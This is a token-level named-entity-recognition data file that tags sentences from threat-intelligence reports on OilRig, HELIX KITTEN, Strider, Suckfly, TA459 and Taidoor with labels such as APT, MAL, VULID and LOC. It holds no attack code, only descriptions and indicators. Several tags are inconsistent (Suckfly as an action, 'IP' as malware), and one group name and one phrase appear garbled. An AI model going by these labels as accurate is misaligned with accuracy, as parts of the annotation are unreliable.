+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+observed O
+OilRig S-APT
+'s O
+testing B-ACT
+activities E-ACT
+and O
+with O
+high O
+confidence O
+links O
+this O
+testing O
+to O
+the O
+creation O
+of O
+the O
+weaponized O
+delivery O
+document O
+used O
+in O
+this O
+attack O
+. O
+
+While O
+investigating O
+recent O
+attacks O
+performed O
+by O
+the O
+threat B-APT
+actor I-APT
+group I-APT
+OilRig E-APT
+using O
+their O
+new O
+Bondupdater S-MAL
+version O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+searched O
+for O
+additional O
+Microsoft S-IDTY
+Office O
+documents O
+used O
+by O
+OilRig S-APT
+hoping O
+to O
+locate O
+additional O
+malware O
+being O
+used O
+in O
+other O
+attacks O
+during O
+the O
+same O
+time O
+period O
+. O
+
+The O
+tester O
+created O
+the O
+final O
+test O
+file O
+less O
+than O
+8 O
+hours O
+before O
+the O
+creation O
+time O
+of O
+a O
+delivery O
+document O
+, O
+which O
+was O
+then O
+delivered O
+via O
+a O
+spear-phishing S-ACT
+email E-ACT
+20 O
+minutes O
+later O
+. O
+
+During O
+this O
+testing O
+, O
+we O
+saw O
+document O
+filenames O
+that O
+contain O
+the O
+C2 S-TOOL
+we O
+witnessed O
+in O
+the O
+targeted B-ACT
+attack E-ACT
+above O
+, O
+specifically O
+the O
+filenames O
+XLS-withyourface.xls S-FILE
+and O
+XLS-withyourface B-FILE
+– I-FILE
+test.xls E-FILE
+. O
+
+These O
+samples O
+appeared O
+to O
+have O
+been O
+created O
+by O
+OilRig S-APT
+during O
+their O
+development O
+and O
+testing B-ACT
+activities E-ACT
+, O
+all O
+of O
+which O
+share O
+many O
+similarities O
+with O
+the O
+delivery O
+document O
+used O
+in O
+the O
+recent O
+OilRig B-APT
+attack E-APT
+against O
+a O
+Middle B-LOC
+Eastern E-LOC
+government S-IDTY
+, O
+N56.15.doc S-FILE
+( O
+7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 S-SHA2
+) O
+that O
+we O
+have O
+also O
+included O
+in O
+Table O
+1 O
+. O
+
+However O
+, O
+they O
+later O
+continued O
+by O
+making O
+modifications O
+to O
+the O
+Excel B-ACT
+document E-ACT
+just O
+prior O
+to O
+the O
+attack O
+on O
+August B-TIME
+26th E-TIME
+. O
+
+HELIX B-APT
+KITTEN E-APT
+is O
+likely O
+an O
+Iranian-based S-LOC
+adversary O
+group O
+, O
+active O
+since O
+at O
+least O
+late B-TIME
+2015 E-TIME
+, O
+targeting O
+organizations O
+in O
+the O
+aerospace S-IDTY
+, O
+energy S-IDTY
+, O
+financial S-IDTY
+, O
+government S-IDTY
+, O
+hospitality S-IDTY
+and O
+telecommunications B-IDTY
+business E-IDTY
+verticals O
+. O
+
+Additionally O
+, O
+HELIX B-APT
+KITTEN I-APT
+actors E-APT
+have O
+shown O
+an O
+affinity O
+for O
+creating O
+thoroughly O
+researched O
+and O
+structured O
+spear-phishing S-ACT
+messages O
+relevant O
+to O
+the O
+interests O
+of O
+targeted O
+personnel S-IDTY
+. O
+
+In O
+addition O
+to O
+Helminth S-MAL
+, O
+the O
+ISMDoor S-MAL
+implant O
+is O
+likely O
+used O
+by O
+the O
+Iran-based S-LOC
+adversary O
+to O
+attack O
+targets O
+particularly O
+those O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+These O
+incidents O
+involved O
+spear-phishing S-ACT
+attacks E-ACT
+, O
+which O
+characteristic O
+of O
+HELIX B-APT
+KITTEN E-APT
+, O
+included O
+emails S-TOOL
+containing O
+malicious O
+PowerShell S-MAL
+in O
+their O
+macros O
+that O
+connects O
+to O
+known O
+C2 S-TOOL
+infrastructure O
+. O
+
+During O
+the O
+summer B-TIME
+of I-TIME
+2018 E-TIME
+, O
+HELIX B-APT
+KITTEN I-APT
+actors E-APT
+were O
+observed O
+targeting O
+entities O
+in O
+the O
+Middle B-LOC
+East E-LOC
+— O
+of O
+note O
+, O
+targets O
+appeared O
+to O
+be O
+located O
+in O
+Bahrain S-LOC
+and O
+Kuwait S-LOC
+. O
+
+ISMDoor S-MAL
+is O
+able O
+to O
+exfiltrate O
+data O
+, O
+take O
+screenshots O
+, O
+and O
+execute O
+arbitrary O
+commands O
+on O
+the O
+victim O
+'s O
+machine O
+. O
+
+In O
+early B-TIME
+November I-TIME
+2018 E-TIME
+, O
+CrowdStrike S-SECTEAM
+observed O
+activity O
+from O
+the O
+HELIX B-APT
+KITTEN E-APT
+adversary O
+at O
+a O
+customer O
+in O
+the O
+telecommunications S-IDTY
+vertical O
+. O
+
+The O
+attackers S-APT
+sent O
+multiple O
+emails S-TOOL
+containing O
+macro-enabled O
+XLS B-FILE
+files E-FILE
+to O
+employees B-IDTY
+working I-IDTY
+in I-IDTY
+the I-IDTY
+banking I-IDTY
+sector E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+In O
+the O
+first O
+week O
+of O
+May B-TIME
+2016 E-TIME
+, O
+FireEye B-SECTEAM
+'s I-SECTEAM
+DTI E-SECTEAM
+identified O
+a O
+wave O
+of O
+emails S-TOOL
+containing O
+malicious B-FILE
+attachments E-FILE
+being O
+sent O
+to O
+multiple O
+banks S-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+Our O
+data O
+suggests O
+that O
+actors S-APT
+have O
+deployed O
+the O
+RGDoor B-MAL
+backdoor E-MAL
+on O
+webservers O
+belonging O
+to O
+eight O
+Middle B-LOC
+Eastern E-LOC
+government B-IDTY
+organizations E-IDTY
+, O
+as O
+well O
+as O
+one O
+financial S-IDTY
+and O
+one O
+educational B-IDTY
+institution E-IDTY
+. O
+
+In O
+August B-TIME
+2018 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+observed O
+OilRig S-APT
+targeting O
+a O
+government B-IDTY
+organization E-IDTY
+using O
+spear-phishing S-ACT
+emails S-TOOL
+to O
+deliver O
+an O
+updated O
+version O
+of O
+a O
+Trojan S-MAL
+known O
+as O
+BONDUPDATER S-MAL
+. O
+
+The O
+OilRig B-APT
+group E-APT
+has O
+been O
+active O
+since O
+at O
+least O
+mid-2016 S-TIME
+, O
+and O
+continues O
+their O
+attack B-ACT
+campaigns E-ACT
+throughout O
+the O
+Middle B-LOC
+East E-LOC
+, O
+targeting O
+both O
+governmental B-IDTY
+agencies E-IDTY
+and O
+businesses S-IDTY
+on O
+an O
+almost O
+routine O
+basis O
+. O
+
+BONDUPDATER S-MAL
+is O
+a O
+PowerShell-based B-MAL
+Trojan E-MAL
+first O
+discovered O
+by O
+FireEye S-SECTEAM
+in O
+mid-November B-TIME
+2017 E-TIME
+, O
+when O
+OilRig S-APT
+targeted O
+a O
+different O
+Middle B-LOC
+Eastern E-LOC
+governmental B-IDTY
+organization E-IDTY
+. O
+
+During O
+the O
+past O
+month O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+observed O
+several O
+attacks O
+against O
+a O
+Middle B-LOC
+Eastern E-LOC
+government S-IDTY
+leveraging O
+an O
+updated O
+version O
+of O
+the O
+BONDUPDATER S-MAL
+malware S-MAL
+, O
+which O
+now O
+includes O
+the O
+ability O
+to O
+use O
+TXT O
+records O
+within O
+its O
+DNS B-MAL
+tunneling E-MAL
+protocol O
+for O
+its O
+C2 S-TOOL
+communications O
+. O
+
+The O
+email S-ACT
+had O
+no O
+subject O
+and O
+what O
+initially O
+drew O
+our O
+attention O
+to O
+OilRig S-APT
+'s O
+attack O
+was O
+the O
+content O
+of O
+the O
+spear B-ACT
+phishing I-ACT
+email E-ACT
+. O
+
+As O
+expected O
+, O
+OilRig S-APT
+is O
+continuing O
+their O
+onslaught O
+of O
+attacks O
+well O
+into O
+2018 S-TIME
+with O
+continued O
+targeting O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+First O
+identified O
+in O
+January B-TIME
+2015 E-TIME
+, O
+Orangeworm O
+has O
+also O
+conducted O
+targeted B-ACT
+attacks E-ACT
+against O
+organizations O
+in O
+related O
+industries O
+as O
+part O
+of O
+a O
+larger O
+supply-chain B-ACT
+attack E-ACT
+in O
+order O
+to O
+reach O
+their O
+intended O
+victims O
+. O
+
+According O
+to O
+Symantec S-SECTEAM
+telemetry O
+, O
+almost O
+40 O
+percent O
+of O
+Orangeworm O
+'s O
+confirmed O
+victim O
+organizations O
+operate O
+within O
+the O
+healthcare B-IDTY
+industry E-IDTY
+. O
+
+Their O
+next O
+move O
+was O
+to O
+list O
+any O
+remote O
+shared O
+drives O
+and O
+then O
+attempt O
+to O
+access O
+remote O
+shares O
+owned O
+by O
+the O
+specific O
+government B-IDTY
+office E-IDTY
+they O
+were O
+targeting O
+, O
+again O
+attempting O
+to O
+extract O
+all O
+Word B-FILE
+documents E-FILE
+. O
+
+Sowbug S-APT
+'s O
+next O
+move O
+was O
+to O
+list O
+any O
+remote O
+shared O
+drives O
+and O
+then O
+attempt O
+to O
+access O
+remote O
+shares O
+owned O
+by O
+the O
+specific O
+government B-IDTY
+office E-IDTY
+they O
+were O
+targeting O
+, O
+again O
+attempting O
+to O
+extract O
+all O
+Word B-FILE
+documents E-FILE
+. O
+
+For O
+example O
+, O
+in O
+September B-TIME
+2016 E-TIME
+, O
+Sowbug S-APT
+infiltrated O
+an O
+organization O
+in O
+Asia S-LOC
+, O
+deploying O
+the O
+Felismus B-MAL
+backdoor E-MAL
+on O
+one O
+of O
+its O
+computers O
+, O
+Computer O
+A O
+, O
+using O
+the O
+file O
+name O
+adobecms.exe S-FILE
+in O
+CSIDL_WINDOWS\debug S-FILE
+. O
+
+In O
+this O
+case O
+, O
+the O
+attackers O
+maintained O
+a O
+presence O
+on O
+the O
+target O
+'s O
+network O
+for O
+nearly O
+six O
+months O
+between O
+September B-TIME
+2016 E-TIME
+and O
+March B-TIME
+2017 E-TIME
+. O
+
+In O
+other O
+attacks O
+, O
+there O
+was O
+evidence O
+that O
+Felismus S-MAL
+was O
+installed O
+using O
+a O
+tool O
+known O
+as O
+Starloader S-MAL
+( O
+detected O
+by O
+Symantec S-SECTEAM
+as O
+Trojan.Starloader S-MAL
+) O
+. O
+
+Symantec S-SECTEAM
+has O
+found O
+evidence O
+of O
+Starloader B-FILE
+files E-FILE
+being O
+named O
+AdobeUpdate.exe S-FILE
+, O
+AcrobatUpdate.exe S-FILE
+, O
+and O
+INTELUPDATE.EXE S-FILE
+among O
+others O
+. O
+
+Additionally O
+, O
+Starloader S-MAL
+was O
+also O
+observed O
+deploying O
+additional O
+tools O
+used O
+by O
+the O
+attackers O
+, O
+such O
+as O
+credential B-MAL
+dumpers E-MAL
+and O
+keyloggers S-MAL
+. O
+
+ASERT S-SECTEAM
+has O
+learned O
+of O
+an O
+APT B-ACT
+campaign E-ACT
+, O
+possibly O
+originating O
+from O
+DPRK O
+, O
+we O
+are O
+calling O
+STOLEN O
+PENCIL O
+that O
+is O
+targeting O
+academic B-IDTY
+institutions E-IDTY
+since O
+at O
+least O
+May B-TIME
+2018 E-TIME
+. O
+
+Once O
+gaining O
+a O
+foothold O
+on O
+a O
+user O
+'s O
+system O
+, O
+the O
+threat O
+actors O
+behind O
+STOLEN O
+PENCIL O
+use O
+Microsoft S-IDTY
+'s O
+Remote B-TOOL
+Desktop I-TOOL
+Protocol E-TOOL
+( O
+RDP S-TOOL
+) O
+for O
+remote O
+point-and-click O
+access O
+. O
+
+The O
+group O
+uses O
+an O
+advanced O
+piece O
+of O
+malware O
+known O
+as O
+Remsec S-MAL
+( O
+Backdoor.Remsec S-MAL
+) O
+to O
+conduct O
+its O
+attacks O
+. O
+
+Strider S-APT
+has O
+been O
+active O
+since O
+at O
+least O
+October B-TIME
+2011 E-TIME
+. O
+
+Lua B-MAL
+modules E-MAL
+is O
+a O
+technique O
+that O
+has O
+previously O
+been O
+used O
+by O
+Flamer O
+. O
+
+The O
+Remsec S-MAL
+malware S-MAL
+used O
+by O
+Strider S-APT
+has O
+a O
+modular O
+design O
+. O
+
+The O
+group O
+has O
+maintained O
+a O
+low O
+profile O
+until O
+now O
+and O
+its O
+targets O
+have O
+been O
+mainly O
+organizations O
+and O
+individuals O
+that O
+would O
+be O
+of O
+interest O
+to O
+a O
+nation O
+state O
+'s O
+intelligence B-IDTY
+services E-IDTY
+. O
+
+The O
+group O
+'s O
+targets O
+include O
+a O
+number O
+of O
+organizations O
+and O
+individuals O
+located O
+in O
+Russia S-LOC
+. O
+
+Remsec S-MAL
+uses O
+a O
+Lua B-MAL
+interpreter E-MAL
+to O
+run O
+Lua B-MAL
+modules E-MAL
+which O
+perform O
+various O
+functions O
+. O
+
+Russia S-LOC
+. O
+
+The O
+attackers O
+then O
+began O
+to O
+perform O
+reconnaissance O
+activities S-ACT
+on O
+Computer O
+A O
+via O
+cmd.exe S-FILE
+, O
+collecting O
+system-related O
+information O
+, O
+such O
+as O
+the O
+OS O
+version O
+, O
+hardware O
+configuration O
+, O
+and O
+network O
+information O
+. O
+
+the O
+group O
+'s O
+targets O
+include O
+an O
+organization O
+in O
+Sweden O
+. O
+
+the O
+group O
+'s O
+targets O
+include O
+an O
+embassy S-IDTY
+in O
+Belgium O
+. O
+
+Symantec S-SECTEAM
+will O
+continue O
+to O
+search O
+for O
+more O
+Remsec B-MAL
+modules E-MAL
+and O
+targets O
+in O
+order O
+to O
+build O
+upon O
+our O
+understanding O
+of O
+Strider S-APT
+and O
+better O
+protect O
+our O
+customers O
+. O
+
+Another O
+such O
+an O
+exceptional O
+espionage O
+platform O
+is O
+" O
+ProjectSauron S-MAL
+, O
+also O
+known O
+as O
+" O
+Strider S-APT
+" O
+. O
+
+In O
+September B-TIME
+2015 E-TIME
+, O
+our O
+anti-targeted O
+attack O
+technologies O
+caught O
+a O
+previously O
+unknown O
+attack O
+. O
+
+Forensic O
+analysis O
+indicates O
+that O
+the O
+APT O
+has O
+been O
+operational O
+since O
+at O
+least O
+June B-TIME
+2011 E-TIME
+and O
+was O
+still O
+active O
+in O
+2016 S-TIME
+. O
+
+After O
+getting O
+the O
+IP S-PROT
+, O
+the O
+ProjectSauron S-MAL
+component O
+tries O
+to O
+communicate O
+with O
+the O
+remote O
+server O
+using O
+its O
+own O
+( O
+ProjectSauron S-MAL
+) O
+protocol O
+as O
+if O
+it O
+was O
+yet O
+another O
+C&C S-TOOL
+server O
+. O
+
+In O
+a O
+number O
+of O
+the O
+cases O
+we O
+analyzed O
+, O
+ProjectSauron S-MAL
+deployed O
+malicious B-MAL
+modules E-MAL
+inside O
+the O
+custom O
+network O
+encryption O
+'s O
+software O
+directory O
+, O
+disguised O
+under O
+similar O
+filenames O
+and O
+accessing O
+the O
+data O
+placed O
+beside O
+its O
+own O
+executable O
+. O
+
+The O
+threat O
+actor O
+behind O
+ProjectSauron S-MAL
+commands O
+a O
+top-of-the-top O
+modular O
+cyber-espionage O
+platform O
+in O
+terms O
+of O
+technical O
+sophistication O
+, O
+designed O
+to O
+enable O
+long-term O
+campaigns O
+through O
+stealthy O
+survival O
+mechanisms O
+coupled O
+with O
+multiple O
+Exfiltration S-ACT
+methods O
+. O
+
+In O
+September B-TIME
+2015 E-TIME
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+Anti-Targeted O
+Attack O
+Platform O
+discovered O
+anomalous B-FILE
+network I-FILE
+traffic E-FILE
+in O
+a O
+government B-IDTY
+organization E-IDTY
+network O
+. O
+
+In O
+late O
+2015 S-TIME
+, O
+Symantec S-SECTEAM
+identified O
+suspicious O
+activity O
+involving O
+a O
+hacking O
+tool O
+used O
+in O
+a O
+malicious O
+manner O
+against O
+one O
+of O
+our O
+customers S-IDTY
+. O
+
+Secondary O
+ProjectSauron B-MAL
+modules E-MAL
+are O
+designed O
+to O
+perform O
+specific O
+functions O
+like O
+stealing B-ACT
+documents E-ACT
+, O
+recording B-ACT
+keystrokes E-ACT
+, O
+and O
+hijacking B-ACT
+encryption I-ACT
+keys E-ACT
+from O
+both O
+infected O
+computers O
+and O
+attached O
+USB O
+sticks O
+. O
+
+activity O
+originated O
+from O
+three O
+separate O
+IP S-PROT
+addresses O
+, O
+all O
+located O
+in O
+Chengdu S-LOC
+, O
+China S-LOC
+. O
+
+We O
+don't O
+know O
+the O
+exact O
+date O
+Suckfly O
+stole O
+the O
+certificates O
+from O
+the O
+South B-LOC
+Korean E-LOC
+organizations O
+. O
+
+stolen O
+certificates O
+being O
+used O
+maliciously O
+occurred O
+in O
+early O
+2014 O
+. O
+
+Symantec S-SECTEAM
+detects O
+this O
+threat O
+as O
+Backdoor.Nidiran S-FILE
+. O
+
+Specifically O
+, O
+Suckfly O
+used O
+a O
+specially O
+crafted O
+web O
+page O
+to O
+deliver O
+an O
+exploit S-VULNAME
+for O
+the O
+Microsoft B-TOOL
+Windows I-TOOL
+OLE I-TOOL
+Remote I-TOOL
+Code I-TOOL
+Execution I-TOOL
+Vulnerability O
+( O
+CVE-2014-6332 S-VULID
+) O
+, O
+which O
+affects O
+specific O
+versions O
+of O
+Microsoft S-IDTY
+Windows S-OS
+. O
+
+The O
+threat O
+then O
+executes O
+" O
+svchost.exe S-MAL
+" O
+. O
+
+Attackers O
+have O
+been O
+known O
+to O
+distribute O
+malicious B-FILE
+files E-FILE
+masquerading O
+as O
+the O
+legitimate O
+iviewers.dll B-MAL
+file E-MAL
+and O
+then O
+use O
+DLL B-MAL
+load I-MAL
+hijacking E-MAL
+to O
+execute O
+the O
+malicious O
+code O
+and O
+infect O
+the O
+computer O
+. O
+
+Once O
+exploit S-VULNAME
+has O
+been O
+achieved O
+, O
+Nidiran S-MAL
+is O
+delivered O
+through O
+a O
+self-extracting B-MAL
+executable E-MAL
+that O
+extracts O
+the O
+components O
+to O
+a O
+.tmp S-FILE
+folder O
+after O
+it O
+has O
+been O
+executed O
+. O
+
+The O
+certificates O
+Blackfly O
+stole O
+were O
+also O
+from O
+South B-LOC
+Korean E-LOC
+companies S-IDTY
+, O
+primarily O
+in O
+the O
+video B-IDTY
+game I-IDTY
+and I-IDTY
+software I-IDTY
+development I-IDTY
+industry E-IDTY
+. O
+
+Blackfly S-APT
+began O
+with O
+a O
+campaign O
+to O
+steal O
+certificates O
+, O
+which O
+were O
+later O
+used O
+to O
+sign O
+malware O
+used O
+in O
+targeted B-ACT
+attacks E-ACT
+. O
+
+In O
+March B-TIME
+2016 E-TIME
+, O
+Symantec S-SECTEAM
+published O
+a O
+blog O
+on O
+Suckfly O
+, O
+an O
+advanced O
+cyberespionage O
+group O
+that O
+conducted O
+attacks O
+against O
+a O
+number O
+of O
+South B-LOC
+Korean E-LOC
+organizations O
+to O
+steal O
+digital O
+certificates O
+. O
+
+Since O
+then O
+we O
+have O
+identified O
+a O
+number O
+of O
+attacks O
+over O
+a O
+two-year O
+period O
+, O
+beginning O
+in O
+April B-TIME
+2014 E-TIME
+, O
+which O
+we O
+attribute O
+to O
+Suckfly O
+. O
+
+The O
+attacks O
+targeted O
+high-profile O
+targets O
+, O
+including O
+government S-IDTY
+and O
+commercial B-IDTY
+organizations E-IDTY
+. O
+
+these O
+attacks O
+were O
+part O
+of O
+a O
+planned O
+operation O
+against O
+specific O
+targets O
+in O
+India S-LOC
+. O
+
+While O
+there O
+have O
+been O
+several O
+Suckfly B-ACT
+campaigns E-ACT
+that O
+infected O
+organizations O
+with O
+the O
+group O
+'s O
+custom O
+malware O
+Backdoor.Nidiran S-FILE
+, O
+the O
+Indian O
+targets O
+show O
+a O
+greater O
+amount O
+of O
+post-infection B-ACT
+activity E-ACT
+than O
+targets O
+in O
+other O
+regions O
+. O
+
+While O
+there O
+have O
+been O
+several O
+Suckfly B-ACT
+campaigns E-ACT
+that O
+infected O
+organizations O
+with O
+the O
+group O
+'s O
+custom O
+malware O
+Backdoor.Nidiran S-FILE
+, O
+the O
+Indian O
+targets O
+show O
+a O
+greater O
+amount O
+of O
+post-infection B-ACT
+activity E-ACT
+than O
+targets O
+in O
+other O
+regions O
+. O
+
+The O
+first O
+known O
+Suckfly B-ACT
+campaign E-ACT
+began O
+in O
+April B-TIME
+of I-TIME
+2014 E-TIME
+. O
+
+Suckfly S-ACT
+'s O
+attacks O
+on O
+government B-IDTY
+organizations E-IDTY
+that O
+provide O
+information B-IDTY
+technology I-IDTY
+services E-IDTY
+to O
+other O
+government S-IDTY
+branches O
+is O
+not O
+limited O
+to O
+India S-LOC
+. O
+
+It O
+has O
+conducted O
+attacks O
+on O
+similar O
+organizations O
+in O
+Saudi B-LOC
+Arabia E-LOC
+, O
+likely O
+because O
+of O
+the O
+access O
+that O
+those O
+organizations O
+have O
+. O
+
+Similar O
+to O
+its O
+other O
+attacks O
+, O
+Suckfly S-ACT
+used O
+the O
+Nidiran B-MAL
+back I-MAL
+door E-MAL
+along O
+with O
+a O
+number O
+of O
+hacktools S-MAL
+to O
+infect O
+the O
+victim O
+'s O
+internal O
+hosts O
+. O
+
+In O
+2015 S-TIME
+, O
+Suckfly S-ACT
+conducted O
+a O
+multistage O
+attack O
+. O
+
+Suckfly S-ACT
+conducted O
+a O
+multistage O
+attack O
+between O
+April B-TIME
+22 E-TIME
+and O
+May B-TIME
+4 E-TIME
+. O
+
+On O
+April B-TIME
+22 E-TIME
+, O
+2015 S-TIME
+, O
+Suckfly S-APT
+exploited O
+a O
+vulnerability O
+on O
+the O
+targeted O
+employee O
+'s O
+operating O
+system O
+( O
+Windows S-OS
+) O
+that O
+allowed O
+the O
+attackers O
+to O
+bypass O
+the O
+User O
+Account O
+Control O
+and O
+install O
+the O
+Nidiran B-MAL
+back I-MAL
+door E-MAL
+to O
+provide O
+access O
+for O
+their O
+attack O
+. O
+
+Suckfly S-ACT
+conducted O
+a O
+multistage O
+attack O
+against O
+an O
+e-commerce B-IDTY
+organization E-IDTY
+. O
+
+Suckfly S-ACT
+conducted O
+a O
+multistage O
+attack O
+against O
+an O
+e-commerce B-IDTY
+organization E-IDTY
+based O
+in O
+India S-LOC
+. O
+
+Most O
+of O
+the O
+group O
+'s O
+attacks O
+are O
+focused O
+on O
+government S-IDTY
+or O
+technology B-IDTY
+related I-IDTY
+companies E-IDTY
+and O
+organizations O
+. O
+
+While O
+we O
+know O
+the O
+attackers O
+used O
+a O
+custom B-MAL
+dropper E-MAL
+to O
+install O
+the O
+back O
+door O
+, O
+we O
+do O
+not O
+know O
+the O
+delivery O
+vector O
+. O
+
+While O
+tracking O
+what O
+days O
+of O
+the O
+week O
+Suckfly O
+used O
+its O
+hacktools S-MAL
+, O
+we O
+discovered O
+that O
+the O
+group O
+was O
+only O
+active O
+Monday O
+through O
+Friday O
+. O
+
+By O
+targeting O
+all O
+of O
+these O
+organizations O
+together O
+, O
+Suckfly O
+could O
+have O
+had O
+a O
+much O
+larger O
+impact O
+on O
+India S-LOC
+and O
+its O
+economy O
+. O
+
+While O
+we O
+don't O
+know O
+the O
+motivations O
+behind O
+the O
+attacks O
+, O
+the O
+targeted O
+commercial B-IDTY
+organizations E-IDTY
+, O
+along O
+with O
+the O
+targeted O
+government B-IDTY
+organizations E-IDTY
+, O
+may O
+point O
+in O
+this O
+direction O
+. O
+
+There O
+is O
+no O
+evidence O
+that O
+Suckfly O
+gained O
+any O
+benefits O
+from O
+attacking O
+the O
+government B-IDTY
+organizations E-IDTY
+, O
+but O
+someone O
+else O
+may O
+have O
+benefited O
+from O
+these O
+attacks O
+. O
+
+During O
+this O
+time O
+they O
+were O
+able O
+to O
+steal O
+digital O
+certificates O
+from O
+South B-LOC
+Korean E-LOC
+companies S-IDTY
+and O
+launch O
+attacks O
+against O
+Indian O
+and O
+Saudi O
+Arabian O
+government B-IDTY
+organizations E-IDTY
+. O
+
+We O
+believe O
+that O
+Suckfly S-ACT
+will O
+continue O
+to O
+target O
+organizations O
+in O
+India S-LOC
+and O
+similar O
+organizations O
+in O
+other O
+countries O
+in O
+order O
+to O
+provide O
+economic S-IDTY
+insight O
+to O
+the O
+organization O
+behind O
+Suckfly S-ACT
+'s O
+operations O
+. O
+
+This O
+time O
+, O
+however O
+, O
+TA459 O
+opportunistically O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+a O
+Microsoft B-FILE
+Word I-FILE
+attachment E-FILE
+exploiting O
+the O
+recently O
+patched O
+CVE-2017-0199 S-VULID
+to O
+deploy O
+the O
+ZeroT B-MAL
+Trojan E-MAL
+, O
+which O
+in O
+turn O
+downloaded O
+the O
+PlugX B-MAL
+Remote I-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+Proofpoint S-SECTEAM
+is O
+tracking O
+this O
+attacker O
+, O
+believed O
+to O
+operate O
+out O
+of O
+China S-LOC
+, O
+as O
+TA459 S-APT
+. O
+
+This O
+time O
+, O
+however O
+, O
+attackers O
+opportunistically O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+a O
+Microsoft B-FILE
+Word I-FILE
+attachment E-FILE
+exploiting O
+the O
+recently O
+patched O
+CVE-2017-0199 S-VULID
+to O
+deploy O
+the O
+ZeroT B-MAL
+Trojan E-MAL
+, O
+which O
+in O
+turn O
+downloaded O
+the O
+PlugX B-MAL
+Remote I-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+TA549 S-APT
+possesses O
+a O
+diverse O
+malware O
+arsenal O
+including O
+PlugX S-MAL
+, O
+NetTraveler S-MAL
+, O
+and O
+ZeroT S-MAL
+. O
+
+TA459 S-APT
+is O
+well-known O
+for O
+targeting O
+organizations O
+in O
+Russia O
+and O
+neighboring O
+countries O
+. O
+
+Ongoing O
+activity O
+from O
+attack O
+groups O
+like O
+TA459 S-APT
+who O
+consistently O
+target O
+individuals O
+specializing O
+in O
+particular O
+LOCs O
+of O
+research O
+and O
+expertise O
+further O
+complicate O
+an O
+already O
+difficult O
+security O
+situation O
+for O
+organizations O
+dealing O
+with O
+more O
+traditional O
+malware O
+threats O
+, O
+phishing B-ACT
+campaigns E-ACT
+, O
+and O
+socially O
+engineered O
+threats O
+every O
+day O
+. O
+
+Using O
+data O
+collected O
+from O
+the O
+Trend B-SECTEAM
+Micro™ I-SECTEAM
+Smart I-SECTEAM
+Protection I-SECTEAM
+Network E-SECTEAM
+, O
+we O
+are O
+able O
+to O
+identify O
+victims O
+whose O
+networks O
+communicated O
+with O
+Taidoor B-MAL
+C&C I-MAL
+servers E-MAL
+. O
+
+The O
+Taidoor O
+attackers O
+have O
+been O
+actively O
+engaging O
+in O
+targeted B-ACT
+attacks E-ACT
+since O
+at O
+least O
+March B-TIME
+4 E-TIME
+, O
+2009 S-TIME
+. O
+
+Taidoor O
+spoofed O
+Taiwanese S-LOC
+government S-IDTY
+email S-TOOL
+addresses O
+to O
+send O
+out O
+socially B-ACT
+engineered E-ACT
+emails S-TOOL
+in O
+the O
+Chinese S-LOC
+language O
+that O
+typically O
+leveraged O
+Taiwan-themed O
+issues O
+. O
+
+Despite O
+some O
+exceptions O
+, O
+the O
+Taidoor B-ACT
+campaign E-ACT
+often O
+used O
+Taiwanese S-LOC
+IP S-MAL
+addresses O
+as O
+C&C S-TOOL
+servers O
+and O
+email S-TOOL
+addresses O
+to O
+send O
+out O
+socially B-ACT
+engineered E-ACT
+emails S-TOOL
+with O
+malware O
+as O
+attachments O
+. O
+
+One O
+of O
+the O
+primary O
+targets O
+of O
+the O
+Taidoor B-ACT
+campaign E-ACT
+appeared O
+to O
+be O
+the O
+Taiwanese S-LOC
+government S-IDTY
+. O
+
+Suckfly O
+targeted O
+one O
+of O
+India S-LOC
+'s O
+largest O
+e-commerce B-IDTY
+companies E-IDTY
+, O
+a O
+major O
+Indian O
+shipping B-IDTY
+company E-IDTY
+, O
+one O
+of O
+India S-LOC
+'s O
+largest O
+financial B-IDTY
+organizations E-IDTY
+, O
+and O
+an O
+IT B-IDTY
+firm E-IDTY
+that O
+provides O
+support O
+for O
+India S-LOC
+'s O
+largest O
+stock O
+exchange O
+. O
+
+Data O
+from O
+the O
+early O
+part O
+of O
+this O
+year O
+shows O
+that O
+the O
+Taidoor O
+attackers O
+rampantly O
+used O
+malicious.DOC S-FILE
+files O
+to O
+exploit S-VULNAME
+a O
+Microsoft S-IDTY
+Common B-TOOL
+Controls E-TOOL
+vulnerability S-VULNAME
+, O
+CVE-2012-0158 S-VULID
+. O
+
+Taidoor O
+actively O
+sent O
+out O
+malicious B-ACT
+documents E-ACT
+and O
+maintained O
+several O
+IP B-ACT
+addresses E-ACT
+for O
+command O
+and O
+control O
+. O
+
+The O
+attackers O
+actively O
+sent O
+out O
+malicious O
+documents O
+and O
+maintained O
+several O
+IP B-ACT
+addresses E-ACT
+for O
+command O
+and O
+control O
+. O
+
+As O
+part O
+of O
+their O
+social B-IDTY
+engineering E-IDTY
+ploy O
+, O
+the O
+Taidoor O
+attackers O
+attach O
+a O
+decoy O
+document O
+to O
+their O
+emails S-TOOL
+that O
+, O
+when O
+opened O
+, O
+displays O
+the O
+contents O
+of O
+a O
+legitimate O
+document O
+but O
+executes O
+a O
+malicious O
+payload O
+in O
+the O
+background O
+. O
+
+Sometimes O
+, O
+however O
+, O
+certain O
+samples O
+made O
+use O
+of O
+domain B-ACT
+names E-ACT
+for O
+HTTP S-PROT
+communication O
+. O
+
+Based O
+on O
+the O
+command O
+capabilities O
+of O
+the O
+Taidoor S-MAL
+malware S-MAL
+, O
+we O
+were O
+able O
+to O
+determine O
+that O
+data O
+theft O
+and O
+data O
+destruction O
+was O
+possible O
+. O
+
+The O
+ultimate O
+objective O
+of O
+targeted B-ACT
+attacks E-ACT
+is O
+to O
+acquire O
+sensitive O
+data O
+. O
+
+In O
+December B-TIME
+2017 E-TIME
+, O
+FireEye S-SECTEAM
+publicly O
+released O
+our O
+first O
+analysis O
+on O
+the O
